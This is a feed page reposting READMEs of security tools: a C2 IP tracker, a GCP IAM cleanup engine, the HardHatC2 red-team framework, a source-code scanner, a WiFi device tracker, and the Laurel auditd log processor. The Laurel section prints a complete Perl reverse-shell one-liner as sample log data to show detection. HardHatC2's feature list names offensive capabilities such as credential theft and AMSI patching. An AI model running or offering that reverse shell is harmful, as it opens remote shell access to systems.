FreshRSS

๐Ÿ”’
โŒ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayTools

C2-Tracker - Live Feed Of C2 Servers, Tools, And Botnets

By: Zion3R


Free to use IOC feed for various tools/malware. It started out for just C2 tools but has morphed into tracking infostealers and botnets as well. It uses shodan.io/">Shodan searches to collect the IPs. The most recent collection is always stored in data; the IPs are broken down by tool and there is an all.txt.

The feed should update daily. Actively working on making the backend more reliable


Honorable Mentions

Many of the Shodan queries have been sourced from other CTI researchers:

Huge shoutout to them!

Thanks to BertJanCyber for creating the KQL query for ingesting this feed

And finally, thanks to Y_nexro for creating C2Live in order to visualize the data

What do I track?

Running Locally

If you want to host a private version, put your Shodan API key in an environment variable called SHODAN_API_KEY

echo SHODAN_API_KEY=API_KEY >> ~/.bashrc
bash
python3 -m pip install -r requirements.txt
python3 tracker.py

Contributing

I encourage opening an issue/PR if you know of any additional Shodan searches for identifying adversary infrastructure. I will not set any hard guidelines around what can be submitted, just know, fidelity is paramount (high true/false positive ratio is the focus).

References



CureIAM - Clean Accounts Over Permissions In GCP Infra At Scale

By: Zion3R

Clean up of over permissioned IAM accounts on GCP infra in an automated way

CureIAM is an easy-to-use, reliable, and performant engine for Least Privilege Principle Enforcement on GCP cloud infra. It enables DevOps and Security team to quickly clean up accounts in GCP infra that have granted permissions of more than what are required. CureIAM fetches the recommendations and insights from GCP IAM recommender, scores them and enforce those recommendations automatically on daily basic. It takes care of scheduling and all other aspects of running these enforcement jobs at scale. It is built on top of GCP IAM recommender APIs and Cloudmarker framework.


Key features

Discover what makes CureIAM scalable and production grade.

  • Config driven : The entire workflow of CureIAM is config driven. Skip to Config section to know more about it.
  • Scalable : Its is designed to scale because of its plugin driven, multiprocess and multi-threaded approach.
  • Handles Scheduling: Scheduling part is embedded in CureIAM code itself, configure the time, and CureIAM will run daily at that time note.
  • Plugin driven: CureIAM codebase is completely plugin oriented, which means, one can plug and play the existing plugins or create new to add more functionality to it.
  • Track actionable insights: Every action that CureIAM takes, is recorded for audit purpose, It can do that in file store and in elasticsearch store. If you want you can build other store plugins to push that to other stores for tracking purposes.
  • Scoring and Enforcement: Every recommendation that is fetch by CureIAM is scored against various parameters, after that couple of scores like safe_to_apply_score, risk_score, over_privilege_score. Each score serves a different purpose. For safe_to_apply_score identifies the capability to apply recommendation on automated basis, based on the threshold set in CureIAM.yaml config file.

Usage

Since CureIAM is built with python, you can run it locally with these commands. Before running make sure to have a configuration file ready in either of /etc/CureIAM.yaml, ~/.CureIAM.yaml, ~/CureIAM.yaml, or CureIAM.yaml and there is Service account JSON file present in current directory with name preferably cureiamSA.json. This SA private key can be named anything, but for docker image build, it is preferred to use this name. Make you to reference this file in config for GCP cloud.

# Install necessary dependencies
$ pip install -r requirements.txt

# Run CureIAM now
$ python -m CureIAM -n

# Run CureIAM process as schedular
$ python -m CureIAM

# Check CureIAM help
$ python -m CureIAM --help

CureIAM can be also run inside a docker environment, this is completely optional and can be used for CI/CD with K8s cluster deployment.

# Build docker image from dockerfile
$ docker build -t cureiam .

# Run the image, as schedular
$ docker run -d cureiam

# Run the image now
$ docker run -f cureiam -m cureiam -n

Config

CureIAM.yaml configuration file is the heart of CureIAM engine. Everything that engine does it does it based on the pipeline configured in this config file. Let's break this down in different sections to make this config look simpler.

  1. Let's configure first section, which is logging configuration and scheduler configuration.
  logger:
version: 1

disable_existing_loggers: false

formatters:
verysimple:
format: >-
[%(process)s]
%(name)s:%(lineno)d - %(message)s
datefmt: "%Y-%m-%d %H:%M:%S"

handlers:
rich_console:
class: rich.logging.RichHandler
formatter: verysimple

file:
class: logging.handlers.TimedRotatingFileHandler
formatter: simple
filename: /tmp/CureIAM.log
when: midnight
encoding: utf8
backupCount: 5

loggers:
adal-python:
level: INFO

root:
level: INFO
handlers:
- rich_console
- file

schedule: "16:00"

This subsection of config uses, Rich logging module and schedules CureIAM to run daily at 16:00.

  1. Next section is configure different modules, which we MIGHT use in pipeline. This falls under plugins section in CureIAM.yaml. You can think of this section as declaration for different plugins.
  plugins:
gcpCloud:
plugin: CureIAM.plugins.gcp.gcpcloud.GCPCloudIAMRecommendations
params:
key_file_path: cureiamSA.json

filestore:
plugin: CureIAM.plugins.files.filestore.FileStore

gcpIamProcessor:
plugin: CureIAM.plugins.gcp.gcpcloudiam.GCPIAMRecommendationProcessor
params:
mode_scan: true
mode_enforce: true
enforcer:
key_file_path: cureiamSA.json
allowlist_projects:
- alpha
blocklist_projects:
- beta
blocklist_accounts:
- foo@bar.com
allowlist_account_types:
- user
- group
- serviceAccount
blocklist_account_types:
- None
min_safe_to_apply_score_user: 0
min_safe_to_apply_scor e_group: 0
min_safe_to_apply_score_SA: 50

esstore:
plugin: CureIAM.plugins.elastic.esstore.EsStore
params:
# Change http to https later if your elastic are using https
scheme: http
host: es-host.com
port: 9200
index: cureiam-stg
username: security
password: securepassword

Each of these plugins declaration has to be of this form:

  plugins:
<plugin-name>:
plugin: <class-name-as-python-path>
params:
param1: val1
param2: val2

For example, for plugins CureIAM.stores.esstore.EsStore which is this file and class EsStore. All the params which are defined in yaml has to match the declaration in __init__() function of the same plugin class.

  1. Once plugins are defined , next step is to define how to define pipeline for auditing. And it goes like this:
  audits:
IAMAudit:
clouds:
- gcpCloud
processors:
- gcpIamProcessor
stores:
- filestore
- esstore

Multiple Audits can be created out of this. The one created here is named IAMAudit with three plugins in use, gcpCloud, gcpIamProcessor, filestores and esstore. Note these are the same plugin names defined in Step 2. Again this is like defining the pipeline, not actually running it. It will be considered for running with definition in next step.

  1. Tell CureIAM to run the Audits defined in previous step.
  run:
- IAMAudits

And this makes the entire configuration for CureIAM, you can find the full sample here, this config driven pipeline concept is inherited from Cloudmarker framework.

Dashboard

The JSON which is indexed in elasticsearch using Elasticsearch store plugin, can be used to generate dashboard in Kibana.

Contribute

[Please do!] We are looking for any kind of contribution to improve CureIAM's core funtionality and documentation. When in doubt, make a PR!

Credits

Gojek Product Security Team

Demo

<>

=============

NEW UPDATES May 2023 0.2.0

Refactoring

  • Breaking down the large code into multiple small function
  • Moving all plugins into plugins folder: Esstore, files, Cloud and GCP.
  • Adding fixes into zero divide issues
  • Migration to new major version of elastic
  • Change configuration in CureIAM.yaml file
  • Tested in python version 3.9.X

Library Updates

Adding the version in library to avoid any back compatibility issues.

  • Elastic==8.7.0 # previously 7.17.9
  • elasticsearch==8.7.0
  • google-api-python-client==2.86.0
  • PyYAML==6.0
  • schedule==1.2.0
  • rich==13.3.5

Docker Files

  • Adding Docker Compose for local Elastic and Kibana in elastic
  • Adding .env-ex change .env-ex to .env to before running the docker
Running docker compose: docker-compose -f docker_compose_es.yaml up 

Features

  • Adding the capability to run scan without applying the recommendation. By default, if mode_scan is false, mode_enforce won't be running.
      mode_scan: true
mode_enforce: false
  • Turn off the email function temporarily.


HardHatC2 - A C# Command And Control Framework

By: Zion3R


A cross-platform, collaborative, Command & Control framework written in C#, designed for red teaming and ease of use.

HardHat is a multiplayer C# .NET-based command and control framework. Designed to aid in red team engagements and penetration testing. HardHat aims to improve the quality of life factors during engagements by providing an easy-to-use but still robust C2 framework.
It contains three primary components, an ASP.NET teamserver, a blazor .NET client, and C# based implants.


Release Tracking

Alpha Release - 3/29/23 NOTE: HardHat is in Alpha release; it will have bugs, missing features, and unexpected things will happen. Thank you for trying it, and please report back any issues or missing features so they can be addressed.

Community

Discord Join the community to talk about HardHat C2, Programming, Red teaming and general cyber security things The discord community is also a great way to request help, submit new features, stay up to date on the latest additions, and submit bugs.

Features

Teamserver & Client

  • Per-operator accounts with account tiers to allow customized access control and features, including view-only guest modes, team-lead opsec approval(WIP), and admin accounts for general operation management.
  • Managers (Listeners)
  • Dynamic Payload Generation (Exe, Dll, shellcode, PowerShell command)
  • Creation & editing of C2 profiles on the fly in the client
  • Customization of payload generation
    • sleep time/jitter
    • kill date
    • working hours
    • type (Exe, Dll, Shellcode, ps command)
    • Included commands(WIP)
    • option to run confuser
  • File upload & Downloads
  • Graph View
  • File Browser GUI
  • Event Log
  • JSON logging for events & tasks
  • Loot tracking (Creds, downloads)
  • IOC tracing
  • Pivot proxies (SOCKS 4a, Port forwards)
  • Cred store
  • Autocomplete command history
  • Detailed help command
  • Interactive bash terminal command if the client is on linux or powershell on windows, this allows automatic parsing and logging of terminal commands like proxychains
  • Persistent database storage of teamserver items (User accounts, Managers, Engineers, Events, tasks, creds, downloads, uploads, etc. )
  • Recon Entity Tracking (track info about users/devices, random metadata as needed)
  • Shared files for some commands (see teamserver page for details)
  • tab-based interact window for command issuing
  • table-based output option for some commands like ls, ps, etc.
  • Auto parsing of output from seatbelt to create "recon entities" and fill entries to reference back to later easily
  • Dark and Light
    ๏คฎ
    theme

Engineers

  • C# .NET framework implant for windows devices, currently only CLR/.NET 4 support
  • atm only one implant, but looking to add others
  • It can be generated as EXE, DLL, shellcode, or PowerShell stager
  • Rc4 encryption of payload memory & heap when sleeping (Exe / DLL only)
  • AES encryption of all network communication
  • ConfuserEx integration for obfuscation
  • HTTP, HTTPS, TCP, SMB communication
    • TCP & SMB can work P2P in a bind or reverse setups
  • Unique per implant key generated at compile time
  • multiple callback URI's depending on the C2 profile
  • P/Invoke & D/Invoke integration for windows API calls
  • SOCKS 4a support
  • Reverse Port Forward & Port Forwards
  • All commands run as async cancellable jobs
    • Option to run commands sync if desired
  • Inline assembly execution & inline shellcode execution
  • DLL Injection
  • Execute assembly & Mimikatz integration
  • Mimikatz is not built into the implant but is pushed when specific commands are issued
  • Various localhost & network enumeration tools
  • Token manipulation commands
    • Steal Token Mask(WIP)
  • Lateral Movement Commands
  • Jump (psexec, wmi, wmi-ps, winrm, dcom)
  • Remote Execution (WIP)
  • AMSI & ETW Patching
  • Unmanaged Powershell
  • Script Store (can load multiple scripts at once if needed)
  • Spawn & Inject
    • Spawn-to is configurable
  • run, shell & execute

Documentation

documentation can be found at docs

Getting Started

Prerequisites

  • Installation of the .net 7 SDK from Microsoft
  • Once installed, the teamserver and client are started with dotnet run

Teamserver

To configure the team server's starting address (where clients will connect), edit the HardHatC2\TeamServer\Properties\LaunchSettings.json changing the "applicationUrl": "https://127.0.0.1:5000" to the desired location and port. start the teamserver with dotnet run from its top-level folder ../HrdHatC2/Teamserver/

HardHat Client

  1. When starting the client to set the target teamserver location, include it in the command line dotnet run https://127.0.0.1:5000 for example
  2. open a web browser and navigate to https://localhost:7096/ if this works, you should see the login page
  3. Log in with the HardHat_Admin user (Password is printed on first TeamServer startup)
  4. Navigate to the settings page & create a new user if successful, a message should appear, then you may log in with that account to access the full client

Contributions & Bug Reports

Code contributions are welcome feel free to submit feature requests, pull requests or send me your ideas on discord.



SCodeScanner - Stands For Source Code Scanner Where The User Can Scans The Source Code For Finding The Critical Vulnerabilities


SCodeScanner stands for Source Code scanner where the user can scans the source code for finding the Critical Vulnerabilities. The main objective for this scanner is to find the vulnerabilities inside the source code before code gets published in Prod.


Features

  1. Supported PHP Language
  2. Supported YAML Language
  3. Pass results to bug tracking services like Jira also Slack (Sending files to group to multiple people at once).
  4. Gives results in JSON format, which can easily be used to any other program.
  5. Works with Rules. We only need to create some rules which the target rule is not present in php/yaml directory.
  6. Rules that can scan advance patterns

Achievements

SCodeScanner received 5 CVEs for finding vulnerabilities in multiple CMS plugins.

  • CVE-2022-1465
  • CVE-2022-1474
  • CVE-2022-1527
  • CVE-2022-1532
  • CVE-2022-1604

How to run?

  • Download the repository -
  • Run pip3 install -r requirements.txt
  • And run python3 scscanner.py --help

Feedback/Imporvements

I would love to hear your feedback on this tool. Open issues if you found any. And open PR request if you have something.

Contact

Utkarsh Agrawal
Website



dBmonster - Track WiFi Devices With Their Recieved Signal Strength


With dBmonster you are able to scan for nearby WiFi devices and track them trough the signal strength (dBm) of their sent packets (sniffed with TShark). These dBm values will be plotted to a graph with matplotlib. It can help you to identify the exact location of nearby WiFi devices (use a directional WiFi antenna for the best results) or to find out how your self made antenna works the best (antenna radiation patterns).


Features on Linux and MacOS

Feature Linux MacOS
Listing WiFi interfaces
โœ…
โœ…
Track & scan on 2.4GHz
โœ…
โœ…
Track & scan on 5GHz
โœ…
โœ…
Scanning for AP
โœ…
โœ…
Scanning for STA
โœ…
Beep when device found
โ“
โœ…

Installation

git clone https://github.com/90N45-d3v/dBmonster
cd dBmonster

# Install required tools (On MacOS without sudo)
sudo python requirements.py

# Start dBmonster
sudo python dBmonster.py

Has been successfully tested on...

Platform
๏’ป
WiFi Adapter
๏“ก
Kali Linux ALFA AWUS036NHA, DIY Bi-Quad WiFi Antenna
MacOS Monterey Internal card 802.11 a/b/g/n/ac (MBP 2019)
* should work on any MacOS or Debian based system and with every WiFi card that supports monitor-mode

Troubleshooting for MacOS

Normally, you can only enable monitor-mode on the internal wifi card from MacOS with the airport utility from Apple. Somehow, wireshark (or here TShark) can enable it too on MacOS. Cool, but because of the MacOS system and Wiresharkโ€™s workaround, there are many issues running dBmonster on MacOS. After some time, it could freeze and/or you have to stop dBmonster/Tshark manually from the CLI with the ps command. If you want to run it anyway, here are some helpful tips:

Kill dBmonster, if you can't stop it over the GUI

Look if there are any processes, named dBmonster, tshark or python:

sudo ps -U root

Now kill them with the following command:

sudo kill <PID OF PROCESS>

Stop monitor-mode, if it's enabled after running dBmonster

sudo airport <WiFi INTERFACE NAME> sniff

Press control + c after a few seconds

* Please contact me on twitter, if you have anymore problems

Working on...

  • Capture signal strength data for offline graphs
  • Generate graphs from normal wireshark.pcapng file
  • Generate multiple graphs in one coordinate system

Additional information

  • If the tracked WiFi device is out of range or doesn't send any packets, the graph stops plotting till there is new data. So don't panic ;)
  • dBmonster wasn't tested on all systems... If there are any errors or something is going wrong, contact me.
  • If you used dBmonster on a non-listed Platform or WiFi Adapter, please open an issue (with Platform and WiFi Adapter information) and I will add your specification to the README.md


Laurel - Transform Linux Audit Logs For SIEM Usage


LAUREL is an event post-processing plugin for auditd(8) to improve its usability in modern security monitoring setups.


Why?

TLDR: Instead of audit events that look like thisโ€ฆ

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742โ€ฆ

โ€ฆturn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance:

{ โ€ฆ "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, โ€ฆ}

This happens at the source. The generated event even contains useful information about the spawning process:

"PARENT_INFO":{"ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Description

Logs produced by the Linux Audit subsystem and auditd(8) contain information that can be very useful in a SIEM context (if a useful rule set has been configured). However, the format is not well-suited for at-scale analysis: Events are usually split across different lines that have to be merged using a message identifier. Files and program executions are logged via PATH and EXECVE elements, but a limited character set for strings causes many of those entries to be hex-encoded. For a more detailed discussion, see Practical auditd(8) problems.

LAUREL solves these problems by consuming audit events, parsing and transforming them into more data and writing them out as a JSON-based log format, while keeping all information intact that was part of the original audit log. It does not replace auditd(8) as the consumer of audit messages from the kernel. Instead, it uses the audisp ("audit dispatch") interface to receive messages via auditd(8). Therefore, it can peacefully coexist with other consumers of audit events (e.g. some EDR products).

Refer to JSON-based log format for a description of the log format.

We developed this tool because we were not content with feature sets and performance characteristics of existing projects and products. Please refer to Performance for details.

A word about audit rules

A good starting point for an audit ruleset is https://github.com/Neo23x0/auditd, but generally speaking, any ruleset will do. LAUREL will currently only work as designed if End Of Event record are not suppressed, so rules like

-a always,exclude -F msgtype=EOE

should be removed.

Events with context

Every event that is caused by a syscall or filesystem rule is annotated with information about the parent of the process that caused the event. If available, id points to the message corresponding to the last execve syscall for this process:

"PARENT_INFO": {
"ID": "1643635026.276:327308",
"comm": "sh",
"exe": "/usr/bin/dash",
"ppid": 1532
}

Adding more context: Keys and process labels

Audit events can contain a key, a short string that can be used to filter events. LAUREL can be configured to recognize such keys and add them as keys to the process that caused the event. These labels can also be propagated to child processes. This is useful to avoid expensive JOIN-like operations in log analysis to filter out harmless events.

Consider the following rule that set keys for apt and dpkg invocations:

-w /usr/bin/apt-get -p x -k software_mgmt

Let's configure LAUREL to turn the software_mgmt key into a process label that is propagated to child processes:

Together with a ruleset that logs execve(2) and variants, this will cause every event directly caused by apt-get and its subprocesses to be labelled software_mgmt.

For example, running sudo apt-get update on a Debian/bullseye system with a few sources configured, the following subprocesses labelled software_gmt can be observed in LAUREL's audit log:

  • apt-get update
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/gpgv
  • /usr/lib/apt/methods/gpgv
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/bin/dpkg --print-foreign-architectures

This sort of tracking also works for package installation or removal. If some package's post-installation script is behaving suspiciously, a SIEM analyst will be able to make the connection to the software installation process by inspecting the single event.

Installation

See INSTALL.md.

License

GNU General Public License, version 3

Authors

The logo was created by Birgit Meyer <hello@biggi.io>.



โŒ